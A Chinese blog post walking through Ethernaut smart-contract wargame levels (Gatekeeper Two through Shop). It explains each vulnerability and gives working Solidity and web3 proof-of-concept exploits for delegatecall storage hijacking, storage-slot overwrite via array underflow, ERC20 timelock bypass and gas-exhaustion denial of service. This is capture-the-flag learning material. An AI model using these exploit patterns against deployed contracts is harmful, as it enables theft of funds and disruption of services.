主頁 > 區塊鏈 > Ethernaut 靶場刷題(下)

Ethernaut 靶場刷題(下)

2021-04-17 11:48:12 區塊鏈

Gatekeeper Two

又學到了新東西,原始碼:

pragma solidity ^0.6.0;

contract GatekeeperTwo {

  address public entrant;

  modifier gateOne() {
    require(msg.sender != tx.origin);
    _;
  }

  modifier gateTwo() {
    uint x;
    assembly { x := extcodesize(caller()) }
    require(x == 0);
    _;
  }

  modifier gateThree(bytes8 _gateKey) {
    require(uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) ^ uint64(_gateKey) == uint64(0) - 1);
    _;
  }

  function enter(bytes8 _gateKey) public gateOne gateTwo gateThree(_gateKey) returns (bool) {
    entrant = tx.origin;
    return true;
  }
}

相對來說比較難的是gateTwo那里不知道該怎么繞,涉及到行內注釋,學習文章:
ethervm
Solidity 中撰寫行內匯編(assembly)的那些事[譯]

assembly { x := extcodesize(caller()) }
caller():message caller address
extcodesize():length of the contract bytecode at addr, in bytes

extcodesize是用來檢查地址是不是合約地址的:

caller 為合約時,獲取的大小為合約位元組碼大小,caller 為賬戶時,獲取的大小為 0 ,

因此正常這里如果繞過gateOne的require(msg.sender != tx.origin);的話,這里也就繞不過了,因此我以為是gateOne的那里需要改變一種姿勢繞,但是查不到新姿勢,,,
看了一下,WP:

經過研究發現,當合約在初始化,還未完全創建時,代碼大小是可以為0的,因此,我們需要把攻擊合約的呼叫操作寫在 constructor 建構式中,

因此只要把攻擊代碼寫在constructor里面就可以了,
至于gateOne就很簡單了:

require(uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) ^ uint64(_gateKey) == uint64(0) - 1);

uint64(0)-1存在一個下溢位,溢位后是0xffffffffffffffff,因此前面需要得到0xffffffffffffffff,前面^是相同為0,不同為1,因此必須和前面結果的每一位都不一樣,那就按位取反即可:
gateKey = bytes8(~(uint64(bytes8(keccak256(abi.encodePacked(this))))));

POC:

pragma solidity ^0.6.0;

contract Feng {
    bytes8 public gateKey;
    address public target = 0x376E65f6d59Ec9f5cD3e9F9B18F05A0BB34A0bab;
    constructor() public {
        gateKey = bytes8(~(uint64(bytes8(keccak256(abi.encodePacked(this))))));
        target.call(abi.encodeWithSignature("enter(bytes8)",gateKey));
        
    }
}

Naught Coin

知識盲區,考察了ERC20,
源代碼:

pragma solidity ^0.6.0;

import '@openzeppelin/contracts/token/ERC20/ERC20.sol';

 contract NaughtCoin is ERC20 {

  // string public constant name = 'NaughtCoin';
  // string public constant symbol = '0x0';
  // uint public constant decimals = 18;
  uint public timeLock = now + 10 * 365 days;
  uint256 public INITIAL_SUPPLY;
  address public player;

  constructor(address _player) 
  ERC20('NaughtCoin', '0x0')
  public {
    player = _player;
    INITIAL_SUPPLY = 1000000 * (10**uint256(decimals())); //decimals=18
    // _totalSupply = INITIAL_SUPPLY;
    // _balances[player] = INITIAL_SUPPLY;
    _mint(player, INITIAL_SUPPLY);
    emit Transfer(address(0), player, INITIAL_SUPPLY);
  } 
  
  function transfer(address _to, uint256 _value) override public lockTokens returns(bool) {
    super.transfer(_to, _value);
  }

  // Prevent the initial owner from transferring tokens until the timelock has passed
  modifier lockTokens() {
    if (msg.sender == player) {
      require(now > timeLock);
      _;
    } else {
     _;
    }
  } 
} 

邏輯也不算難,說白了就是player是你自己,你的賬號余額就是INITIAL_SUPPLY = 1000000 * (10**uint256(decimals()));,只要把這些錢轉出去就贏了,但是transfer函式那里有lockTokens,必須now > timeLock才行,即過10年才能轉賬,

這題考察的是ERC20的2個轉賬函式,自己還是太菜了不會ERC20,做完這題后再去把ERC20看一遍,

ERC20有2個轉賬函式transfer和transferFrom:
在這里插入圖片描述
題目里只override了transfer函式,并沒有重寫這個transferFrom函式,因此可以考慮利用transferFrom,

想了一下,發現和之前學solidity時遇到的那個ERC721里的轉賬有些類似:
在這里插入圖片描述
至于為什么類似,分析一下這個ERC20的代碼就知道了:

import '@openzeppelin/contracts/token/ERC20/ERC20.sol';

題目的描述中,help給出了代碼鏈接:
ERC20
看一下:
在這里插入圖片描述

_transfer就不看了,呼叫transfer函式同樣也會進入_transfer,里面具體的進行了轉賬,
注意接下來的2行代碼:

uint256 currentAllowance = _allowances[sender][_msgSender()];
require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");

這個東西一開始我還不知道是啥,覺得很迷,繼續看下面的_approve
在這里插入圖片描述
就相當于tranfer直接是擁有者呼叫,將他的代幣轉給別人,而transfer是由被轉賬的人呼叫,這個_allowances[owner][spender]就是許可的金額,意思是owner這個賬號允許轉給spender這個賬號的代幣的數量,如果這個不空的話,spender就可以呼叫transferFrom函式從owner那里獲得轉賬,
因此上面的那兩行代碼,是檢查被授權的轉賬余額是不是大于等于要求的轉賬余額,
因此我們需要先授權一下轉賬的余額:
在這里插入圖片描述
正好owner是我們自己,也就是player,因此可以授權,這里最簡單就是授權給自己,因為transferFrom函式的這里:

        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];

并不是取_allowances[sender][recipient],因此在這里就相當于取得是自己給自己授權得余額,直接打就可以了:

await contract.approve(player,toWei("1000000"))
await contract.transferFrom(player,contract.address,toWei("1000000"))

還是對ERC20不熟悉呀,去好好學一波,

Preservation

這題沒能做出來,但是知識點我都知道,還是我太菜了,有空要把call的那些一定好好總結一下,

  • call: 最常用的呼叫方式,呼叫后內置變數 msg 的值會修改為呼叫者,執行環境為被呼叫者的運行環境(合約的 storage),
  • delegatecall: 呼叫后內置變數 msg 的值不會修改為呼叫者,但執行環境為呼叫者的運行環境,
  • callcode: 呼叫后內置變數 msg 的值會修改為呼叫者,但執行環境為呼叫者的運行環境,

原始碼就不分析了比較簡單,主要的就是這里:

    function setFirstTime(uint _timeStamp) public {
      timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
    }

參考上面的delegatecall的講解,執行環境為呼叫者的環境,也就是當前Preservation合約的環境,
呼叫了LibraryContractsetTime()方法,修改了storedTime:

    // stores a timestamp 
    uint storedTime;  

    function setTime(uint _time) public {
      storedTime = _time;
    }

storedTime是位于slot0的,因此實際上是修改Preservation合約的storage中slot0,也就是address public timeZone1Library;,因此這個address public timeZone1Library;是我們可控的,既然這個可控了,可以自己寫一個惡意合約,讓這個量是我們的惡意合約的地址,然后這個合約中的setTime函式修改一下slot2的值,也就是owner即可,
寫個POC:

//SPDX-License-Identifier: UNLICENSED

pragma solidity ^0.8.0;

 contract LibraryContract {
     address public timeZone1Library;
     address public timeZone2Library;
     address public owner;      
     function setTime(uint _time) public {
         owner = 0x7D11f36fA2FD9B7A4069650Cd8A2873999263FB8;
     }
 }
 
 contract Feng {
     LibraryContract lib = new LibraryContract();
     address public target = 0xf423151f829CD798877bD52b2752387D22CF5416;
     function attack() public {
         target.call(abi.encodeWithSignature("setFirstTime(uint256)",lib));
         target.call(abi.encodeWithSignature("setFirstTime(uint256)",uint(1)));
     }
 }

Recovery

挺迷的一題,,,主要是因為英文介紹我死活看不懂,,,:

A contract creator has built a very simple token factory contract. Anyone can create new tokens with ease. After deploying the first token contract, the creator sent 0.5 ether to obtain more tokens. They have since lost the contract address.
This level will be completed if you can recover (or remove) the 0.5 ether from the lost contract address.

大致理解就是有一個簡單的代幣工廠合約,任何人都可以很輕易的創造新的代幣,在創建的第一個代幣合約后,創建者發送了0.5ether來獲得更多的代幣,但是他們弄丟了合約的地址,
如果你可以恢復或者拿走著0.5ether從這個丟失的合約地址,你就可以通過,

雖然我對于這個題目的意思有點迷,但我還是會看以太坊瀏覽器,,,
看一下當前的合約,去以太坊里查一下:
在這里插入圖片描述
這個操作讓我挺迷的,,,:
在這里插入圖片描述
d99開頭的是我題目的合約地址,先轉1到0x8d,然后再轉0.5 ether給0xddd,,
感覺好像這個8d07是個中轉的,,,反正迷的很,不過反正那0.5 ether是在0xddda…那里了,直接寫個POC打即可:

//SPDX-License-Identifier: UNLICENSED

pragma solidity ^0.8.0;


interface SimpleToken {    
  function destroy(address payable _to) external ;
}

contract Feng {
    SimpleToken constant private target = SimpleToken(0xDDdA39DcB8bB61Aee73631f83F0068A99bD0b7Dd);
    function attack() public {
        target.destroy(payable(msg.sender));
    }
}

看了別的師傅的WP,這個創建的合約的地址還能算出來,,,,離譜,,,,這方法我就不試了,太懶了,,

MagicNumber

To solve this level, you only need to provide the Ethernaut with a “Solver”, a contract that responds to “whatIsTheMeaningOfLife()” with the right number.
Easy right? Well… there’s a catch.
The solver’s code needs to be really tiny. Really reaaaaaallly tiny. Like freakin’ really really itty-bitty tiny: 10 opcodes at most.
Hint: Perhaps its time to leave the comfort of the Solidity compiler momentarily, and build this one by hand O_o. That’s right: Raw EVM bytecode.
Good luck!

需要讓solver是一個合約,這個合約的whatIsTheMeaningOfLife()函式會回傳一個正確的數字,而且這個函式的opcode不能超過10個,正常寫的話是會超過的,所以要自己手寫opcode,
學習文章,雖然是英文,但是寫的確實很好,認真閱讀就可以理解:
Ethernaut Lvl 19 MagicNumber Walkthrough: How to deploy contracts using raw assembly opcodes
MagicNumber

差不多算是2種思路了,其實最終的原理都差不多,Initialization Opcodes的作用就是:
在這里插入圖片描述
因為我們沒必要寫constructor,因此這部分的opcode就沒有了,只需要有把runtime opcode這部分存盤到memory這部分所需要的opcode就可以了,然后是2種思路,一種就是利用codecopy:
在這里插入圖片描述
或者就是直接return,

用codecopy的話就是這樣:

Runtime Opcodes
602a   
6080   
52      
6020
6080
f3


Initialization Opcodes
600a
600c
6000
39
600a
6000
f3

另外一種return的就不寫了,參考上面的文章即可,

await web3.eth.sendTransaction({from:player,data:"0x600a600c600039600a6000f3602a60805260206080f3"}, function(err,res){console.log(res)})
await contract.setSolver("0x067Cb3Ec131555289AC6C12cF702f121d080e1E1");

學習了一波,感覺對于opcode的理解更深了,

Alien Codex

Storage的Arbitrary Writing,參考我之前寫的文章:
Storage
slot0放的是owner和contact,算出可以覆寫的i值,然后覆寫掉就可以了,
POC:

//SPDX-License-Identifier: UNLICENSED

pragma solidity ^0.6.0;

interface AlienCodex {

  function make_contact() external ;

  function record(bytes32 _content) external ;

  function retract()  external ;

  function revise(uint i, bytes32 _content) external ;
}

contract Feng {
    AlienCodex constant private target = AlienCodex(0x53c5A404b93e96DA6b913c222b728E8825f987E5);
    bytes32 public payload = 0x0000000000000000000000017D11f36fA2FD9B7A4069650Cd8A2873999263FB8;
    function attack() public {
        target.make_contact();
        target.retract();
        uint i = 2**256 - 1 - uint(keccak256(abi.encodePacked(uint(1)))) +1;
        target.revise(i, payload);
    }
}

Denial

從github的wp上摘錄下來的,

expressionsyntaxeffectOPCODE
throwif (condition) { throw; }reverts all state changes and deplete gasversion<0.4.1: INVALID OPCODE - 0xfe, after: REVERT- 0xfddeprecated in version 0.4.13 and removed in version 0.5.0
assertassert(condition);reverts all state changes and depletes all gasINVALID OPCODE - 0xfe
revertif (condition) { revert(value) }reverts all state changes, allows returning a value, refunds remaining gas to callerREVERT - 0xfd
requirerequire(condition, "comment")reverts all state changes, allows returning a value, refunds remaining gas to calleREVERT - 0xfd

這題很明顯就是構造partner合約的fallback,讓:

If you can deny the owner from withdrawing funds when they call withdraw() (whilst the contract still has funds) you will win this level.

這題我一開始還是學的不夠好,solidity基礎不扎實,因為基本上我自己不怎么區分require和assert這樣的,上面的串列已經給出了,但其實上就是,拜占庭版本之前,require和assert確實區別不大,都是恢復狀態,耗盡gas,而在拜占庭版本之后,require不再耗盡gas了,而是refunds remaining gas to calle,

回到這一題上:

    // withdraw 1% to recipient and 1% to owner
    function withdraw() public {
        uint amountToSend = address(this).balance.div(100);
        // perform a call without checking return
        // The recipient can revert, the owner will still get their share
        partner.call.value(amountToSend)("");
        owner.transfer(amountToSend);
        // keep track of last withdrawal time
        timeLastWithdrawn = now;
        withdrawPartnerBalances[partner] = withdrawPartnerBalances[partner].add(amountToSend);
    }

先是call,然后transfer,之所以我用require不行,就在于transfer里出現例外會回退,而call這樣的出現例外會回傳false,下面的仍然會執行,因此想讓下面的transfer出錯,就要把gas耗盡,因此要用assert而不能用require,POC:

//SPDX-License-Identifier: UNLICENSED

pragma solidity ^0.6.0;

interface Denial {

    function setWithdrawPartner(address _partner) external ;

    // withdraw 1% to recipient and 1% to owner
    function withdraw() external ;
    // convenience function
    function contractBalance() external view returns (uint) ;
}

contract Feng {
    Denial constant private target = Denial(0x47D3b14124BC946e5D102367F92B653DCb36d14d);
    fallback() external payable{
        //assert(false);
        require(false);
    }
    constructor() public {
        target.setWithdrawPartner(address(this));
    }
}

Shop

說白了就是自己的Buyer合約的price方法2次的回傳值要不一樣,第一次要大于等于100,第二次要小于100,我寫了一下,但是一直有問題,,,還是我的問題,因為那個gas有3000的限制,不能訪問storage:
在這里插入圖片描述
可以通過isSold來判斷,POC如下:

//SPDX-License-Identifier: UNLICENSED

pragma solidity ^0.6.0;
contract Shop {
  uint public price = 100;
  bool public isSold;

  function buy() public {
    Buyer _buyer = Buyer(msg.sender);

    if (_buyer.price.gas(3000)() >= price && !isSold) {
      isSold = true;
      price = _buyer.price.gas(3000)();
    }
  }
}
contract Buyer {
    bool public flag = false;
  function price() public view  returns (uint){
      if(Shop(msg.sender).isSold() == true){
          return 1;
      }else{
          return 110;
      }
  }
  function attack(address target) public {
      Shop(target).buy();
  }
}

不過我一開始寫的有問題,,就是Buyer合約:

contract Buyer {
    bool public flag = false;
    Shop public target = Shop(address(0xaA4431855E966C98007E17732E78d9feB7adf848));
  function price() public view  returns (uint){
      if(target.isSold() == true){
          return 1;
      }else{
          return 110;
      }
  }
  function attack() public {
      target.buy();
  }
}

attack函式那里,直接用target的話不行,會gas出問題,目前還不清楚是為什么,,,(想了一下想不明白為什么,,,)

轉載請註明出處,本文鏈接:https://www.uj5u.com/qukuanlian/277103.html

標籤:區塊鏈

上一篇:Goodtoken社區最近怎么這么火?聽說結合了智能量化+合約保險+一鍵跟投是真的么?

下一篇:區塊鏈學習筆記(二)——區塊鏈在哪些領域有應用價值

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • JAVA使用 web3j 進行token轉賬

    最近新學習了下區塊鏈這方面的知識,所學不多,給大家分享下。 # 1. 關于web3j web3j是一個高度模塊化,反應性,型別安全的Java和Android庫,用于與智能合約配合并與以太坊網路上的客戶端(節點)集成。 # 2. 準備作業 jdk版本1.8 引入maven <dependency> < ......

    uj5u.com 2020-09-10 03:03:06 more
  • 以太坊智能合約開發框架Truffle

    前言 部署智能合約有多種方式,命令列的瀏覽器的渠道都有,但往往跟我們程式員的風格不太相符,因為我們習慣了在IDE里寫了代碼然后打包運行看效果。 雖然現在IDE中已經存在了Solidity插件,可以撰寫智能合約,但是部署智能合約卻要另走他路,沒辦法進行一個快捷的部署與測驗。 如果團隊管理的區塊節點多、 ......

    uj5u.com 2020-09-10 03:03:12 more
  • 谷歌二次驗證碼成為區塊鏈專用安全碼,你怎么看?

    前言 谷歌身份驗證器,前些年大家都比較陌生,但隨著國內互聯網安全的加強,它越來越多地出現在大家的視野中。 比較廣泛接觸的人群是國際3A游戲愛好者,游戲盜號現象嚴重+國外賬號安全應用廣泛,這類游戲一般都會要求用戶系結名為“兩步驗證”、“雙重驗證”等,平臺一般都推薦用谷歌身份驗證器。 后來區塊鏈業務風靡 ......

    uj5u.com 2020-09-10 03:03:17 more
  • 密碼學DAY1

    目錄 ##1.1 密碼學基本概念 密碼在我們的生活中有著重要的作用,那么密碼究竟來自何方,為何會產生呢? 密碼學是網路安全、資訊安全、區塊鏈等產品的基礎,常見的非對稱加密、對稱加密、散列函式等,都屬于密碼學范疇。 密碼學有數千年的歷史,從最開始的替換法到如今的非對稱加密演算法,經歷了古典密碼學,近代密 ......

    uj5u.com 2020-09-10 03:03:50 more
  • 密碼學DAY1_02

    目錄 ##1.1 ASCII編碼 ASCII(American Standard Code for Information Interchange,美國資訊交換標準代碼)是基于拉丁字母的一套電腦編碼系統,主要用于顯示現代英語和其他西歐語言。它是現今最通用的單位元組編碼系統,并等同于國際標準ISO/IE ......

    uj5u.com 2020-09-10 03:04:50 more
  • 密碼學DAY2

    ##1.1 加密模式 加密模式:https://docs.oracle.com/javase/8/docs/api/javax/crypto/Cipher.html ECB ECB : Electronic codebook, 電子密碼本. 需要加密的訊息按照塊密碼的塊大小被分為數個塊,并對每個塊進 ......

    uj5u.com 2020-09-10 03:05:42 more
  • NTP時鐘服務器的特點(京準電子)

    NTP時鐘服務器的特點(京準電子) NTP時鐘服務器的特點(京準電子) 京準電子官V——ahjzsz 首先對時間同步進行了背景介紹,然后討論了不同的時間同步網路技術,最后指出了建立全球或區域時間同步網存在的問題。 一、概 述 在通信領域,“同步”概念是指頻率的同步,即網路各個節點的時鐘頻率和相位同步 ......

    uj5u.com 2020-09-10 03:05:47 more
  • 標準化考場時鐘同步系統推進智能化校園建設

    標準化考場時鐘同步系統推進智能化校園建設 標準化考場時鐘同步系統推進智能化校園建設 安徽京準電子科技官微——ahjzsz 一、背景概述隨著教育事業的快速發展,學校建設如雨后春筍,隨之而來的學校教育、管理、安全方面的問題成了學校管理人員面臨的最大的挑戰,這些問題同時也是學生家長所擔心的。為了讓學生有更 ......

    uj5u.com 2020-09-10 03:05:51 more
  • 位元幣入門

    引言 位元幣基本結構 位元幣基礎知識 1)哈希演算法 2)非對稱加密技術 3)數字簽名 4)MerkleTree 5)哪有位元幣,有的是UTXO 6)位元幣挖礦與共識 7)區塊驗證(共識) 總結 引言 上一篇我們已經知道了什么是區塊鏈,此篇說一下區塊鏈的第一個應用——位元幣。其實先有位元幣,后有的區塊 ......

    uj5u.com 2020-09-10 03:06:15 more
  • 北斗對時服務器(北斗對時設備)電力系統應用

    北斗對時服務器(北斗對時設備)電力系統應用 北斗對時服務器(北斗對時設備)電力系統應用 京準電子科技官微(ahjzsz) 中國北斗衛星導航系統(英文名稱:BeiDou Navigation Satellite System,簡稱BDS),因為是目前世界范圍內唯一可以大面積提供免費定位服務的系統,所以 ......

    uj5u.com 2020-09-10 03:06:20 more
最新发布
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:46:47 more
  • Hyperledger Fabric 使用 CouchDB 和復雜智能合約開發

    在上個實驗中,我們已經實作了簡單智能合約實作及客戶端開發,但該實驗中智能合約只有基礎的增刪改查功能,且其中的資料管理功能與傳統 MySQL 比相差甚遠。本文將在前面實驗的基礎上,將 Hyperledger Fabric 的默認資料庫支持 LevelDB 改為 CouchDB 模式,以實作更復雜的資料... ......

    uj5u.com 2023-04-16 07:28:31 more
  • .NET Core 波場鏈離線簽名、廣播交易(發送 TRX和USDT)筆記

    Get Started NuGet You can run the following command to install the Tron.Wallet.Net in your project. PM> Install-Package Tron.Wallet.Net 配置 public reco ......

    uj5u.com 2023-04-14 08:08:00 more
  • DKP 黑客分析——不正確的代幣對比率計算

    概述: 2023 年 2 月 8 日,針對 DKP 協議的閃電貸攻擊導致該協議的用戶損失了 8 萬美元,因為 execute() 函式取決于 USDT-DKP 對中兩種代幣的余額比率。 智能合約黑客概述: 攻擊者的交易:0x0c850f,0x2d31 攻擊者地址:0xF38 利用合同:0xf34ad ......

    uj5u.com 2023-04-07 07:46:09 more
  • Defi開發簡介

    Defi開發簡介 介紹 Defi是去中心化金融的縮寫, 是一項旨在利用區塊鏈技術和智能合約創建更加開放,可訪問和透明的金融體系的運動. 這與傳統金融形成鮮明對比,傳統金融通常由少數大型銀行和金融機構控制 在Defi的世界里,用戶可以直接從他們的電腦或移動設備上訪問廣泛的金融服務,而不需要像銀行或者信 ......

    uj5u.com 2023-04-05 08:01:34 more
  • solidity簡單的ERC20代幣實作

    // SPDX-License-Identifier: GPL-3.0 pragma solidity >=0.7.0 <0.9.0; import "hardhat/console.sol"; //ERC20 同質化代幣,每個代幣的本質或性質都是相同 //ETH 是原生代幣,它不是ERC20代幣, ......

    uj5u.com 2023-03-21 07:56:29 more
  • solidity 參考型別修飾符memory、calldata與storage 常量修飾符C

    在solidity語言中 參考型別修飾符(參考型別為存盤空間不固定的數值型別) memory、calldata與storage,它們只能修飾參考型別變數,比如字串、陣列、位元組等... memory 適用于方法傳參、返參或在方法體內使用,使用完就會清除掉,釋放記憶體 calldata 僅適用于方法傳參 ......

    uj5u.com 2023-03-08 07:57:54 more
  • solidity注解標簽

    在solidity語言中 注釋符為// 注解符為/* 內容*/ 或者 是 ///內容 注解中含有這幾個標簽給予我們使用 @title 一個應該描述合約/介面的標題 contract, library, interface @author 作者的名字 contract, library, interf ......

    uj5u.com 2023-03-08 07:57:49 more
  • 評價指標:相似度、GAS消耗

    【代碼注釋自動生成方法綜述】 這些評測指標主要來自機器翻譯和文本總結等研究領域,可以評估候選文本(即基于代碼注釋自動方法而生成)和參考文本(即基于手工方式而生成)的相似度. BLEU指標^[^?88^^?^]^:其全稱是bilingual evaluation understudy.該指標是最早用于 ......

    uj5u.com 2023-02-23 07:27:39 more
  • 基于NOSTR協議的“公有制”版本的Twitter,去中心化社交軟體Damus

    最近,一個幽靈,Web3的幽靈,在網路游蕩,它叫Damus,這玩意詮釋了什么叫做病毒式營銷,滑稽的是,一個Web3產品卻在Web2的產品鏈上瘋狂傳銷,各方大佬紛紛為其背書,到底發生了什么?Damus的葫蘆里,賣的是什么藥? 注冊和簡單實用 很少有什么產品在用戶注冊環節會有什么噱頭,但Damus確實出 ......

    uj5u.com 2023-02-05 06:48:39 more